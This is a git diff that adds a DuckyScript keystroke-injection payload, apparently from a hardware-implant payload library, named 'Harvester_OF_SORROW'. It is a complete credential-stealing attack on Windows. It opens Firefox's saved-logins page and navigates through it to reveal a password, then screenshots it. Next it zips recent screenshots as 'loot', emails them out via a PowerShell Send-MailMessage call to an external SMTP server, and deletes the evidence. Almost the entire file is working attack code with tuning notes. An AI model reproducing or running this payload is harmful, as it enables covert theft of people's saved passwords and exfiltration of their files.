Create payload.txt

payloads/library/credentials/Harvester_OF_SORROW/payload.txt

@@ -0,0 +1,192 @@
+REM Title: Harvester_OF_SORROW
+REM Author: LulzAnarchyAnon
+REM Description: This payload is a long, hard work around to bypass Microsoft Security in Firefox where a
+REM pin, or password is required to export saved log in credentials.
+REM The payload opens firefox about:logins, and tabs, and arrows its way through options. It then takes 
+REM a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot  
+REM to an email of your choosing.
+REM Target: Windows 10, PowerShell & Mozilla Firefox
+Props: Darren Kitchen, KARROTKAK3, I am Jakoby and the-jcksn
+REM Version: 1.0
+REM Category: Credentials (OMG)
+
+
+REM Payload DELAYS,TABS AND ARROWS may need to be ajusted depending on target system speeds.  
+REM After email aqusition you will be able to adjust DELAYS,TABS AND ARROWS to harvest other creds from 
+REM the email screen shot.
+
+GUI r
+DELAY 200
+STRING firefox about:logins
+ENTER
+DELAY 1000
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+TAB
+DELAY 1000
+SHIFT SPACE
+DELAY 5000
+PRINTSCREEN
+DELAY 5000
+GUI r
+DELAY 200
+STRING powershell -windowstyle hidden
+ENTER
+DELAY 2000
+STRING mspaint
+ENTER
+DELAY 5000
+CTRL v
+DELAY 2000
+CTRL s
+TAB
+DELAY 300
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 100
+RIGHTARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+RIGHTARROW
+DELAY 100
+RIGHTARROW
+DELAY 200
+TAB
+DELAY 200
+ENTER
+CTRL RIGHTARROW
+DELAY 100
+CTRL RIGHTARROW
+DELAY 100
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+RIGHTARROW
+DELAY 200
+RIGHTARROW
+ENTER
+TAB
+ENTER
+DELAY 1000
+ALT f
+DELAY 50
+ALT X
+DELAY 50
+ALT f
+DELAY 50
+X
+DELAY 2000
+REM ~~~~ You must change the USER_EMAIL and USER_PASSWORD to your outlook credentials.
+REM ~~~~ Can exfil more than 5, but I chose 5 to keep file sizes low.
+REM ~~~~ Can exfil from directory other than screenshots by changing path on lines 18, 57, and 61.
+REM ~~~~ You might have to adjust the delays, depending on the target machine, but these worked ok for me.
+REM ~~~~ Use responsibly, and within the confines of the law.
+DELAY 2000
+GUI r
+DELAY 200
+REM navigating to the directory to exfil from - change the following if you do not want the latest screenshots
+STRING %USERPROFILE%\Pictures\Screenshots
+ENTER
+DELAY 150
+REM sorting the files by date
+MENU
+DELAY 150
+STRING o
+DELAY 150
+DOWNARROW
+DELAY 150
+ENTER
+DELAY 150
+REM selecting files to exfil, repeat this line if you want more than 5, but bear in mind this might impact some of the delays
+SHIFT RIGHTARROW
+SHIFT RIGHTARROW
+SHIFT RIGHTARROW
+SHIFT RIGHTARROW
+DELAY 150
+REM sending files to loot.zip
+MENU
+DELAY 150
+STRING n
+DELAY 200
+DOWNARROW
+DELAY 150
+ENTER
+DELAY 500
+STRING loot
+ENTER
+DELAY 150
+ALT F4
+DELAY 150
+GUI r
+DELAY 150
+REM open powershell and send the email
+STRING powershell
+ENTER
+DELAY 500
+REM ~~~~~~~CHANGE THE USERNAME (3 times) AND PASSWORD (once) IN THE FOLLOWING~~~~~
+STRING Send-MailMessage -From user@example.com -To user@example.com -Subject "Photo loot" -Body "Please find attached your zip file" -Attachment "Pictures\Screenshots\loot.zip" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList user@example.com, (ConvertTo-SecureString -String "supersecretpassword" -AsPlainText -Force))
+ENTER
+DELAY 500
+REM cleanup
+STRING del Pictures\Screenshots\loot.zip
+ENTER
+DELAY 150
+STRING exit
+ENTER
+